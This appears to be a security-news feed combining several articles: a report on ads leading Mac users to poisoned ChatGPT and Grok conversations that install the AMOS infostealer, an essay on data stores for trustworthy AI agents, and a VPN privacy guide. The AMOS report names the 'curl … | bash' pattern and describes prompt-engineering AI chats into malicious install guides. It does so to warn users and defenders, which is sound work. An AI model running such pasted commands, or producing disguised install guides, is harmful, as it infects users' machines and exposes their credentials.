Digital ID schemes don’t simply verify who you are—they redefine who can access services and what those services look like. They become a gatekeeper to essential societal infrastructure, enabling governments and state agencies to close doors as easily as they open them. And they disproportionately harm those already at society’s margins, including people seeking asylum and undocumented communities, who already face heightened surveillance and risk.

Even the strongest recommended safeguards cannot resolve the core problem: a mandatory digital ID scheme that shifts power dramatically away from individuals and toward the state. No one should be coerced—technically or socially—into a digital system in order to participate fully in public life. And at a time when almost 3 million people in the UK have called on politicians to reject this proposal, the government must listen to people and say no to digital ID.

Read our civil society briefing in full here.

New Advanced Phishing Kits Use AI and MFA Bypass Tactics to Steal Credentials at Scale

12 December 2025 at 09:04
Cybersecurity researchers have documented four new phishing kits named BlackForce, GhostFrame, InboxPrime AI, and Spiderman that are capable of facilitating credential theft at scale. BlackForce, first detected in August 2025, is designed to steal credentials and perform Man-in-the-Browser (MitB) attacks to capture one-time passwords (OTPs) and bypass multi-factor authentication (MFA). The kit

3 Compliance Processes to Automate in 2026

12 December 2025 at 07:00

For years, compliance has been one of the most resource-intensive responsibilities for cybersecurity teams. Despite growing investments in tools, the day-to-day reality of compliance is still dominated by manual, duplicative tasks. Teams chase down screenshots, review spreadsheets, and cross-check logs, often spending weeks gathering information before an assessment or audit.

The post 3 Compliance Processes to Automate in 2026 appeared first on Security Boulevard.

Google ads funnel Mac users to poisoned AI chats that spread the AMOS infostealer

12 December 2025 at 09:26

Researchers have found evidence that AI conversations were inserted in Google search results to mislead macOS users into installing the Atomic macOS Stealer (AMOS). Both Grok and ChatGPT were found to have been abused in these attacks.

Forensic investigation of an AMOS alert showed the infection chain started when the user ran a Google search for “clear disk space on macOS.” Following that trail, the researchers found not one, but two poisoned AI conversations with instructions. Their testing showed that similar searches produced the same type of results, indicating this was a deliberate attempt to infect Mac users.

The search results led to AI conversations which provided clearly laid out instructions to run a command in the macOS Terminal. That command would end with the machine being infected with the AMOS malware.

If that sounds familiar, you may have read our post about sponsored search results that led to fake macOS software on GitHub. In that campaign, sponsored ads and SEO-poisoned search results pointed users to GitHub pages impersonating legitimate macOS software, where attackers provided step-by-step instructions that ultimately installed the AMOS infostealer.

As the researchers pointed out:

“Once the victim executed the command, a multi-stage infection chain began. The base64-encoded string in the Terminal command decoded to a URL hosting a malicious bash script, the first stage of an AMOS deployment designed to harvest credentials, escalate privileges, and establish persistence without ever triggering a security warning.”
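
The obfuscation step the researchers describe is trivial to reproduce. As a hypothetical sketch (the encoded string below decodes to a placeholder URL, not a real AMOS sample):

```python
import base64

# A malicious one-liner typically embeds its payload URL as a base64 string
# so it looks like random noise in the Terminal command. Decoding it reveals
# what the command really points at.
# (example.invalid is a placeholder, not an actual attacker domain.)
encoded = "aHR0cHM6Ly9leGFtcGxlLmludmFsaWQvdXBkYXRl"
url = base64.b64decode(encoded).decode()
print(url)  # https://example.invalid/update
```

In a real attack, the decoded URL feeds straight into a download-and-execute step, so the victim never sees where the script comes from or what it contains.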

This is dangerous for the user on many levels. Because there is no download prompt or review step, the user never gets a chance to see or assess what the script will do before it runs. And because the attack goes through the command line, it can bypass normal file download protections and execute anything the attacker wants.

Other researchers have found a campaign that combines elements of both attacks: the shared AI conversation and fake software install instructions. They found user guides for installing OpenAI’s new Atlas browser for macOS through shared ChatGPT conversations, which in reality led to AMOS infections.

So how does this work?

The cybercriminals used prompt engineering to get ChatGPT to generate a step‑by‑step “installation/cleanup” guide which in reality will infect a system. ChatGPT’s sharing feature creates a public link to a single conversation that exists in the owner’s account. Attackers can craft a chat to produce the instructions they need and then tidy up the visible conversation so that what’s shared looks like a short, clean guide rather than a long back-and-forth.

Most major chat interfaces (including Grok on X) also let users delete conversations or selectively share screenshots. That makes it easy for criminals to present only the polished, “helpful” part of a conversation and hide how they arrived there.


Then the criminals either pay for a sponsored search result pointing to the shared conversation or they use SEO techniques to get their posts high in the search results. Sponsored search results can be customized to look a lot like legitimate results. You’ll need to check who the advertiser is to find out it’s not real.

[Image: a sponsored ad for ChatGPT Atlas that looks very real. Image courtesy of Kaspersky]

From there, it’s a waiting game for the criminals. They rely on victims to find these AI conversations through search and then faithfully follow the step-by-step instructions.

How to stay safe

These attacks are clever and use legitimate platforms to reach their targets. But there are some precautions you can take.

  • First and foremost, and I can’t say this often enough: don’t click on sponsored search results. We have seen so many cases where sponsored results lead to malware that we recommend skipping them, or making sure you never see them. At best they cost the company you searched for money; at worst you fall prey to imposters.
  • If you’re thinking about following a sponsored advertisement, check the advertiser first. Is it the company you’d expect to pay for that ad? Click the three‑dot menu next to the ad, then choose options like “About this ad” or “About this advertiser” to view the verified advertiser name and location.
  • Use real-time anti-malware protection, preferably one that includes a web protection component.
  • Never run copy-pasted commands from random pages or forums, even if they’re hosted on seemingly legitimate domains, and especially not commands that look like curl … | bash or similar combinations.

If you’ve scanned your Mac and found the AMOS information stealer:

  • Remove any suspicious login items, LaunchAgents, or LaunchDaemons from the Library folders to ensure the malware does not persist after reboot.
  • If any signs of persistent backdoor or unusual activity remain, strongly consider a full clean reinstall of macOS to ensure all malware components are eradicated. Only restore files from known clean backups. Do not reuse backups or Time Machine images that may be tainted by the infostealer.
  • After reinstalling, check for additional rogue browser extensions, cryptowallet apps, and system modifications.
  • Change all the passwords that were stored on the affected system and enable multi-factor authentication (MFA) for your important accounts.

If all this sounds too difficult for you to do yourself, ask someone or a company you trust to help you—our support team is happy to assist you if you have any concerns.


We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Building Trustworthy AI Agents

12 December 2025 at 07:00

The promise of personal AI assistants rests on a dangerous assumption: that we can trust systems we haven’t made trustworthy. We can’t. And today’s versions are failing us in predictable ways: pushing us to do things against our own best interests, gaslighting us into doubting things we have done or things we know, and being unable to distinguish between who we are and who we have been. They struggle with incomplete, inaccurate, and partial context: with no standard way to move toward accuracy, no mechanism to correct sources of error, and no accountability when wrong information leads to bad decisions.

These aren’t edge cases. They’re the result of building AI systems without basic integrity controls. Integrity is the third leg of data security—the old CIA triad of confidentiality, integrity, and availability. We’re good at availability and working on confidentiality, but we’ve never properly solved integrity. Now AI personalization has exposed the gap by accelerating the harms.

The scope of the problem is large. A good AI assistant will need to be trained on everything we do and will need access to our most intimate personal interactions. This means an intimacy greater than your relationship with your email provider, your social media account, your cloud storage, or your phone. It requires an AI system that is both discreet and trustworthy when provided with that data. The system needs to be accurate and complete, but it also needs to be able to keep data private: to selectively disclose pieces of it when required, and to keep it secret otherwise. No current AI system is even close to meeting this.

To further development along these lines, I and others have proposed separating users’ personal data stores from the AI systems that will use them. It makes sense; the engineering expertise that designs and develops AI systems is completely orthogonal to the security expertise that ensures the confidentiality and integrity of data. And by separating them, advances in security can proceed independently from advances in AI.

What would this sort of personal data store look like? Confidentiality without integrity gives you access to wrong data. Availability without integrity gives you reliable access to corrupted data. Integrity enables the other two to be meaningful. Here are six requirements. They emerge from treating integrity as the organizing principle of security to make AI trustworthy.

First, it would be broadly accessible as a data repository. We each want this data to include personal data about ourselves, as well as transaction data from our interactions. It would include data we create when interacting with others—emails, texts, social media posts—and revealed preference data as inferred by other systems. Some of it would be raw data, and some of it would be processed data: revealed preferences, conclusions inferred by other systems, maybe even raw weights in a personal LLM.

Second, it would be broadly accessible as a source of data. This data would need to be made accessible to different LLM systems. This can’t be tied to a single AI model. Our AI future will include many different models—some of them chosen by us for particular tasks, and some thrust upon us by others. We would want the ability for any of those models to use our data.

Third, it would need to be able to prove the accuracy of data. Imagine one of these systems being used to negotiate a bank loan, or participate in a first-round job interview with an AI recruiter. In these instances, the other party will want both relevant data and some sort of proof that the data are complete and accurate.

Fourth, it would be under the user’s fine-grained control and audit. This is a deeply detailed personal dossier, and the user would need to have the final say in who could access it, what portions they could access, and under what circumstances. Users would need to be able to grant and revoke this access quickly and easily, and be able to go back in time and see who has accessed it.

Fifth, it would be secure. The attacks against this system are numerous. There are the obvious read attacks, where an adversary attempts to learn a person’s data. And there are also write attacks, where adversaries add to or change a user’s data. Defending against both is critical; this all implies a complex and robust authentication system.

Sixth, and finally, it must be easy to use. If we’re envisioning digital personal assistants for everybody, it can’t require specialized security training to use properly.
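
Requirement four is the most concrete of the six, and a minimal sketch shows what “fine-grained control and audit” could mean in practice. Everything below is hypothetical—the class and method names are illustrative, not part of Solid or any real protocol:

```python
from datetime import datetime, timezone

class PersonalDataStore:
    """Illustrative sketch: user-controlled, revocable, auditable access grants."""

    def __init__(self):
        self._data = {}        # field name -> value
        self._grants = {}      # consumer -> set of fields it may read
        self._audit_log = []   # (timestamp, consumer, field, allowed)

    def put(self, field, value):
        self._data[field] = value

    def grant(self, consumer, fields):
        # The user decides which consumer may read which fields
        self._grants.setdefault(consumer, set()).update(fields)

    def revoke(self, consumer):
        # Revocation is immediate and total for that consumer
        self._grants.pop(consumer, None)

    def read(self, consumer, field):
        # Every access attempt is logged, allowed or not
        allowed = field in self._grants.get(consumer, set())
        self._audit_log.append((datetime.now(timezone.utc), consumer, field, allowed))
        if not allowed:
            raise PermissionError(f"{consumer} may not read {field}")
        return self._data[field]

    def audit(self):
        # The user can always see who asked for what, and when
        return list(self._audit_log)

store = PersonalDataStore()
store.put("preferred_language", "en")
store.grant("travel-assistant", {"preferred_language"})
print(store.read("travel-assistant", "preferred_language"))  # en
store.revoke("travel-assistant")
# A second read now fails, and both attempts appear in store.audit()
```

A production system would back this with cryptographic verification and real authentication, but the shape is the point: access decisions and the audit trail live with the user, not with the AI.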

I’m not the first to suggest something like this. Researchers have proposed a “Human Context Protocol” (https://papers.ssrn.com/sol3/papers.cfm?abstract_id=5403981) that would serve as a neutral interface for personal data of this type. And in my capacity at a company called Inrupt, Inc., I have been working on an extension of Tim Berners-Lee’s Solid protocol for distributed data ownership.

The engineering expertise to build AI systems is orthogonal to the security expertise needed to protect personal data. AI companies optimize for model performance, but data security requires cryptographic verification, access control, and auditable systems. Separating the two makes sense; you can’t ignore one or the other.

Fortunately, decoupling personal data stores from AI systems means security can advance independently from performance (https://ieeexplore.ieee.org/document/10352412). When you own and control your data store with high integrity, AI can’t easily manipulate you because you see what data it’s using and can correct it. It can’t easily gaslight you because you control the authoritative record of your context. And you determine which historical data are relevant or obsolete. Making this all work is a challenge, but it’s the only way we can have trustworthy AI assistants.

This essay was originally published in IEEE Security & Privacy.

How private is your VPN?

12 December 2025 at 05:25

When you’re shopping around for a Virtual Private Network (VPN) you’ll find yourself in a sea of promises like “military-grade encryption!” and “total anonymity!” You can’t scroll two inches without someone waving around these fancy terms.

But not all VPNs can be trusted. Some VPNs genuinely protect your privacy, and some only sound like they do.

With VPN usage rising around the world for streaming, travel, remote work, and basic digital safety, understanding what makes a VPN truly private matters more than ever.

After years of trying VPNs for myself, privacy-minded family members, and a few mission-critical projects, here’s what I wish everyone knew.

Why do you even need a VPN?

If you’re wondering whether a VPN is worth it, you’re not alone. As your privacy-conscious consumer advocate, let me break down three time-saving and cost-saving benefits of using a privacy-first VPN.

Keep your browsing private

Ever feel like someone’s always looking over your shoulder online? Without a VPN, your internet service provider, and sometimes websites or governments, can keep tabs on what you do. A VPN encrypts your traffic and swaps out your real IP address for one of its own, letting you browse, shop, and read without a digital paper trail following you around.

I’ve run into this myself while traveling. There were times when I needed a VPN just to access US or European web apps that were blocked in certain Asian countries. In other cases, I preferred to appear “based” in the US so that English-language apps would load naturally, instead of defaulting to the local language, currency, or content of the country I was visiting.

Watch what you want, but pay less

Some of your favorite shows and websites are locked away simply because of where you live. In many cases, subscription or pay-per-view prices are higher in more prosperous regions. With a VPN, you can connect to servers in other countries and unlock content that isn’t available at home.

For example, when All Elite Wrestling (AEW) announced its major 2022 pay-per-view featuring CM Punk vs. Jon Moxley, US fans paid $49.99 through Bleacher Report. Fans in the UK, meanwhile, watched the exact same event on FiteTV for $23 less, around half the price. Because platforms determine pricing based on your IP address, a VPN server in another region can show you the pricing available in that country. Savings like that can make a VPN pay for itself quickly.

Stay safe on coffee-shop Wi-Fi

Before you join a network named “Starbucks Guest WiFi,” remember that nothing stops a cybercriminal from broadcasting a hotspot with the same name. Public Wi-Fi is convenient, but it’s also one of the easiest places for someone to snoop on your traffic.

Connecting to your VPN immediately encrypts everything you send or receive. That means you can check email, pay bills, or browse privately without worrying about someone nearby intercepting your information. Getting compromised will cost far more in money, time, and stress than most privacy-first VPN subscriptions.

But what actually makes a VPN privacy-first?

For a VPN, “privacy-first” can’t be just a nice slogan. It’s a mindset that shapes every technical, business, and legal decision.

A privacy-first VPN:

  • Collects as little data as possible — only the minimum needed to run the service.
  • Enforces a real no-logs policy through design, not marketing.
  • Builds privacy into everything, from software to server operations.
  • Practices transparency, often through open-source components and independent audits.

If a VPN can’t explain how it handles these areas, that’s a red flag.

What is WireGuard and why is it such a big deal?

WireGuard isn’t a VPN service. It’s the protocol that powers many modern VPNs, including Malwarebytes Privacy VPN. It’s the engine that handles encryption and securely routes your traffic.

WireGuard is the superstar of the VPN world. Unlike clunkier, older protocols (like OpenVPN or IPsec), it’s deliberately lean and built for the modern internet. Its small codebase is easier to audit and leaves fewer places for bugs to hide. It’s fully open source, so researchers can dig into exactly how it works.

Its cryptography is fast, efficient, and modern with strong encryption, solid key exchange, and lightweight hashing that reduces overhead. In practice, that means better privacy and better performance without a provider having to gather connection data just to keep speeds usable.

Of course, WireGuard is just the foundation. Each VPN implements it differently. The better ones add privacy-friendly tweaks like rotating IP addresses or avoiding static identifiers so that even they can’t link sessions back to individual users.
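
To give a sense of how lean WireGuard is in practice, a complete client-side configuration fits in about a dozen lines. This is an illustrative sketch only; every key, address, and endpoint below is a placeholder:

```ini
# Illustrative WireGuard client config (wg0.conf); all values are placeholders
[Interface]
PrivateKey = <client-private-key>
Address = 10.0.0.2/32
DNS = 10.0.0.1

[Peer]
PublicKey = <server-public-key>
Endpoint = vpn.example.com:51820
AllowedIPs = 0.0.0.0/0, ::/0   # route all traffic through the tunnel
PersistentKeepalive = 25
```

Compare that to a typical OpenVPN deployment, with its certificate chains and cipher negotiation options, and the auditability argument becomes easy to see.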

How to compare VPNs

With VPN usage rising, especially where new age-verification rules have sparked debate about whether VPNs might face future scrutiny, it’s more important than ever to choose providers with strong, transparent privacy practices.

When you boil it down, a handful of questions reveal almost everything about how a VPN treats your privacy:

  • Who controls the infrastructure?
  • Are the servers RAM-only?
  • Which protocol is used, and how is it implemented?
  • What laws apply to the company?
  • Have experts audited the service?
  • Do transparency reports or warrant canaries exist and stay updated?
  • Can you sign up and pay without giving away your entire identity?

If a VPN provider gets evasive about any of this, or runs its service “for free” while collecting data to make the numbers work, that tells you almost everything you need to know.

Why infrastructure ownership matters

One of the most revealing questions you can ask is deceptively simple: Who actually owns the servers?

Most VPNs rent hardware from large data centers or cloud platforms. When they do, your traffic travels through machines managed not only by the VPN’s engineers, but also by whoever runs those facilities. That introduces an access question: Who else has their hands on the hardware?

When a VPN owns and operates its equipment, including racks and networking gear, it reduces the number of unknowns dramatically. The fewer third parties in the chain, the easier it is to stand behind privacy guarantees.

RAM-only (diskless) servers: the gold standard

RAM-only servers take this a step further. Because everything runs in memory, nothing is ever written to a hard drive. Pull the plug and the entire working state disappears instantly, like wiping a whiteboard clean. That means no logs sitting quietly on a disk, nothing for an intruder or authorities to seize, and nothing left behind if ownership, personnel, or legal circumstances change.

This setup also tends to go hand-in-hand with owning the hardware. Most public cloud environments simply don’t allow true diskless deployments with full control over the underlying machine.

Other privacy features to watch for

Even with strong infrastructure and protocols, the details still matter. A solid kill switch keeps your traffic from leaking if the connection drops. Private DNS prevents queries from being routed through third parties. Multi-hop routes make correlation attacks harder. And torrent users may want carefully implemented port forwarding that doesn’t introduce side channels.

These aren’t flashy features, but they show whether a provider has considered the full privacy landscape, not just the obvious parts.

Audits and transparency reports

A provider that truly stands behind its privacy claims will welcome outside inspection. Independent audits, published findings, and ongoing transparency reports help confirm whether logging is disabled in practice, not just in principle. Some companies also maintain warrant canaries (more on this below). None of these are perfect, but together they paint a clear picture of how seriously the VPN treats user trust.

A warrant canary in the VPN coalmine

Okay, so here’s something interesting: some companies use something called a “warrant canary” to quietly let us know if they’ve received a top-secret government request for data. Here’s the deal…it’s illegal for them to simply tell us, “Hey, the government’s snooping around.” So, instead, they publish a simple statement that says something like, “As of January 2026, we haven’t received any secret orders for your data.”

The clever part is that they update this statement on a regular basis. If it suddenly disappears or just stops getting updated, it could mean the company got hit with one of these hush-hush requests and legally can’t talk about it. It’s like the digital version of a warning signal. It is nothing flashy, but if you’re paying attention, you’ll spot when something changes.

It’s not a perfect system (and who knows what the courts will think of it in the future), but a warrant canary is one way companies try to be on our side, finding ways to keep us in the loop even when they’re told to stay silent. So give an extra ounce of trust to companies that publish these regularly.
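
The “paying attention” part can even be automated. As a hypothetical sketch (the dates and the 90-day freshness window below are illustrative, not any provider’s actual policy):

```python
from datetime import date, timedelta

# Hypothetical canary freshness check: a canary that stops being updated
# is the signal. The dates and the 90-day window are made up for illustration.
canary_last_updated = date(2026, 1, 1)   # date stated on the provider's canary page
today = date(2026, 6, 1)                 # fixed here so the example is reproducible
stale = (today - canary_last_updated) > timedelta(days=90)
print("canary stale:", stale)  # True here: time to start asking questions
```

In practice you’d fetch the canary page on a schedule and compare against the current date; the point is that “it stopped updating” is something a few lines of code can watch for you.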

Where privacy-first VPNs are heading

Expect to see continued evolution: new cryptography built for a post-quantum world, more transparency from providers, decentralized and community-run VPN options, and tighter integration with secure messaging, encrypted DNS, and whatever comes next.

It’s also worth keeping an eye on how governments respond to rising VPN use. In the UK, for example, new age-verification rules triggered a huge spike in VPN sign-ups and a public debate about whether VPN usage should be monitored more closely. There’s no proposal to restrict or ban VPNs, but the conversation is active.

If you care about your privacy online, don’t settle for slick marketing. Look for the real foundations like modern protocols, owned and well-managed infrastructure, RAM-only servers, regular audits, and a culture that treats transparency as a habit, not a stunt.

Privacy is engineered, not simply promised. With the right VPN, you stay in control of your digital life instead of hoping someone else remembers to keep your secrets safe.


We don’t just report on privacy—we offer you the option to use it.

Privacy risks should never spread beyond a headline. Keep your online privacy yours by using Malwarebytes Privacy VPN.


